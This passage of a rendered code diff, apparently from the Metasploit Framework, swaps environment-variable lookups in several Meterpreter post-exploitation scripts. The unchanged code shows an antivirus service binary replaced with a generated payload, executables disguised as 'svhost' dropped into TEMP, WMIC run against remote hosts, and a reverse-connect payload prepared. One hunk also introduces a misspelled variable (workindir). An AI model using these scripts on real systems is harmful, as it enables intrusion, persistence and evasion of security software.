userinfo['username'] = uservar
|
||||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||||
users << userinfo
|
users << userinfo
|
||||||
|
|
|
@ -18,13 +18,12 @@ def list_env_vars(var_names)
|
||||||
"Name",
|
"Name",
|
||||||
"Value"
|
"Value"
|
||||||
])
|
])
|
||||||
var_names.flatten.each do |v|
|
@client.sys.config.getenvs(*var_names.flatten).each do |k, v|
|
||||||
tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
|
tbl << [k, v]
|
||||||
end
|
end
|
||||||
print("\n" + tbl.to_s + "\n")
|
print("\n" + tbl.to_s + "\n")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
opts.parse(args) { |opt, idx, val|
|
opts.parse(args) { |opt, idx, val|
|
||||||
case opt
|
case opt
|
||||||
when "-h"
|
when "-h"
|
||||||
|
|
|
@ -114,7 +114,7 @@ def enum_users(os)
|
||||||
users = []
|
users = []
|
||||||
|
|
||||||
path4users = ""
|
path4users = ""
|
||||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||||
|
|
||||||
if os =~ /7|Vista|2008/
|
if os =~ /7|Vista|2008/
|
||||||
path4users = sysdrv + "\\users\\"
|
path4users = sysdrv + "\\users\\"
|
||||||
|
@ -135,7 +135,7 @@ def enum_users(os)
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
userinfo = {}
|
userinfo = {}
|
||||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
uservar = @client.sys.config.getenv('USERNAME')
|
||||||
userinfo['username'] = uservar
|
userinfo['username'] = uservar
|
||||||
userinfo['userappdata'] = path4users + uservar + path2purple
|
userinfo['userappdata'] = path4users + uservar + path2purple
|
||||||
users << userinfo
|
users << userinfo
|
||||||
|
|
|
@ -145,7 +145,7 @@ def enum_users(os)
|
||||||
users = []
|
users = []
|
||||||
|
|
||||||
path4users = ""
|
path4users = ""
|
||||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||||
|
|
||||||
if os =~ /Windows 7|Vista|2008/
|
if os =~ /Windows 7|Vista|2008/
|
||||||
path4users = sysdrv + "\\users\\"
|
path4users = sysdrv + "\\users\\"
|
||||||
|
@ -166,7 +166,7 @@ def enum_users(os)
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
userinfo = {}
|
userinfo = {}
|
||||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
uservar = @client.sys.config.getenv('USERNAME')
|
||||||
userinfo['username'] = uservar
|
userinfo['username'] = uservar
|
||||||
userinfo['userappdata'] = path4users + uservar + path2purple
|
userinfo['userappdata'] = path4users + uservar + path2purple
|
||||||
users << userinfo
|
users << userinfo
|
||||||
|
|
|
@ -301,7 +301,7 @@ def checkdep(session)
|
||||||
tmpout = ""
|
tmpout = ""
|
||||||
depmode = ""
|
depmode = ""
|
||||||
# Expand environment %TEMP% variable
|
# Expand environment %TEMP% variable
|
||||||
tmp = session.fs.file.expand_path("%TEMP%")
|
tmp = session.sys.config.getenv('TEMP')
|
||||||
# Create random name for the wmic output
|
# Create random name for the wmic output
|
||||||
wmicfile = sprintf("%.5d",rand(100000))
|
wmicfile = sprintf("%.5d",rand(100000))
|
||||||
wmicout = "#{tmp}\\#{wmicfile}"
|
wmicout = "#{tmp}\\#{wmicfile}"
|
||||||
|
|
|
@ -30,7 +30,7 @@ end
|
||||||
|
|
||||||
record = ""
|
record = ""
|
||||||
#Set path to the hosts file
|
#Set path to the hosts file
|
||||||
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
|
hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
|
||||||
#Function check if UAC is enabled
|
#Function check if UAC is enabled
|
||||||
def checkuac(session)
|
def checkuac(session)
|
||||||
winver = session.sys.config.sysinfo
|
winver = session.sys.config.sysinfo
|
||||||
|
|
|
@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
|
||||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||||
|
|
||||||
# Change to our working directory.
|
# Change to our working directory.
|
||||||
workingdir = client.fs.file.expand_path("%ProgramFiles%")
|
workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
|
||||||
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
|
client.fs.dir.chdir(workindir)
|
||||||
|
|
||||||
# Create a backup of the original exe.
|
# Create a backup of the original exe.
|
||||||
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
|
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
|
||||||
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
|
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
|
||||||
|
|
||||||
# Place our newly created exe with the orginal binary name.
|
# Place our newly created exe with the orginal binary name.
|
||||||
tempdir = client.fs.file.expand_path("%ProgramFiles%")
|
tempexe = workingdir + "PAVSRV51.EXE"
|
||||||
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
|
|
||||||
|
|
||||||
print_status("Sending EXE payload '#{tempexe}'.")
|
print_status("Sending EXE payload '#{tempexe}'.")
|
||||||
fd = client.fs.file.new(tempexe, "wb")
|
fd = client.fs.file.new(tempexe, "wb")
|
||||||
|
|
|
@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
|
||||||
if target_dir
|
if target_dir
|
||||||
tempdir = target_dir
|
tempdir = target_dir
|
||||||
else
|
else
|
||||||
tempdir = @client.fs.file.expand_path("%TEMP%")
|
tempdir = @client.sys.config.getenv('TEMP')
|
||||||
end
|
end
|
||||||
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
||||||
fd = @client.fs.file.new(tempvbs, "wb")
|
fd = @client.fs.file.new(tempvbs, "wb")
|
||||||
|
|
|
@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
|
||||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||||
|
|
||||||
# Place our newly created exe in %TEMP%
|
# Place our newly created exe in %TEMP%
|
||||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
tempdir = client.sys.config.getenv('TEMP')
|
||||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||||
print_status("Sending EXE payload '#{tempexe}'.")
|
print_status("Sending EXE payload '#{tempexe}'.")
|
||||||
fd = client.fs.file.new(tempexe, "wb")
|
fd = client.fs.file.new(tempexe, "wb")
|
||||||
|
|
|
@ -19,7 +19,7 @@ require 'digest/sha1'
|
||||||
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
|
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
|
||||||
)
|
)
|
||||||
|
|
||||||
@tempdir = @session.fs.file.expand_path("%TEMP%")
|
@tempdir = @session.sys.config.getenv('TEMP')
|
||||||
|
|
||||||
#---------------------------------------------------------------------------------------------------------
|
#---------------------------------------------------------------------------------------------------------
|
||||||
def read_program_list
|
def read_program_list
|
||||||
|
|
|
@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
|
||||||
runfail = 0
|
runfail = 0
|
||||||
runningas = session.sys.config.getuid
|
runningas = session.sys.config.getuid
|
||||||
begin
|
begin
|
||||||
tmp = session.fs.file.expand_path("%TEMP%")
|
tmp = session.sys.config.getenv('TEMP')
|
||||||
# Temporary file on windows host to store results
|
# Temporary file on windows host to store results
|
||||||
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
|
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
|
||||||
|
|
||||||
|
|
|
@ -179,7 +179,7 @@ end
|
||||||
#---------------------------------------------------------------------------------------------------------
|
#---------------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
def upload(session,file)
|
def upload(session,file)
|
||||||
location = session.fs.file.expand_path("%TEMP%")
|
location = session.sys.config.getenv('TEMP')
|
||||||
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
|
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
|
||||||
print_status("Uploading #{file}....")
|
print_status("Uploading #{file}....")
|
||||||
session.fs.file.upload_file("#{fileontrgt}","#{file}")
|
session.fs.file.upload_file("#{fileontrgt}","#{file}")
|
||||||
|
|
|
@ -99,6 +99,10 @@ upload_fn = nil
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
|
|
||||||
|
envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
|
||||||
|
sysdir = envs['SystemRoot']
|
||||||
|
tmpdir = envs['TEMP']
|
||||||
|
|
||||||
# Must have at least one of -c or -u
|
# Must have at least one of -c or -u
|
||||||
if not cmd and not upload_fn
|
if not cmd and not upload_fn
|
||||||
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
|
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
|
||||||
|
@ -110,9 +114,8 @@ if not cmd and not upload_fn
|
||||||
raw = pay.generate
|
raw = pay.generate
|
||||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||||
#and placing it on the target in %TEMP%
|
#and placing it on the target in %TEMP%
|
||||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
|
||||||
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
|
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
|
||||||
cmd = tempdir + "\\" + tempexename + ".exe"
|
cmd = tmpdir + "\\" + tempexename + ".exe"
|
||||||
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
|
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
|
||||||
fd = client.fs.file.new(cmd, "wb")
|
fd = client.fs.file.new(cmd, "wb")
|
||||||
fd.write(exe)
|
fd.write(exe)
|
||||||
|
@ -139,8 +142,6 @@ end
|
||||||
#
|
#
|
||||||
# Upload the payload command if needed
|
# Upload the payload command if needed
|
||||||
#
|
#
|
||||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
|
||||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
|
||||||
if upload_fn
|
if upload_fn
|
||||||
begin
|
begin
|
||||||
location = tmpdir.dup
|
location = tmpdir.dup
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue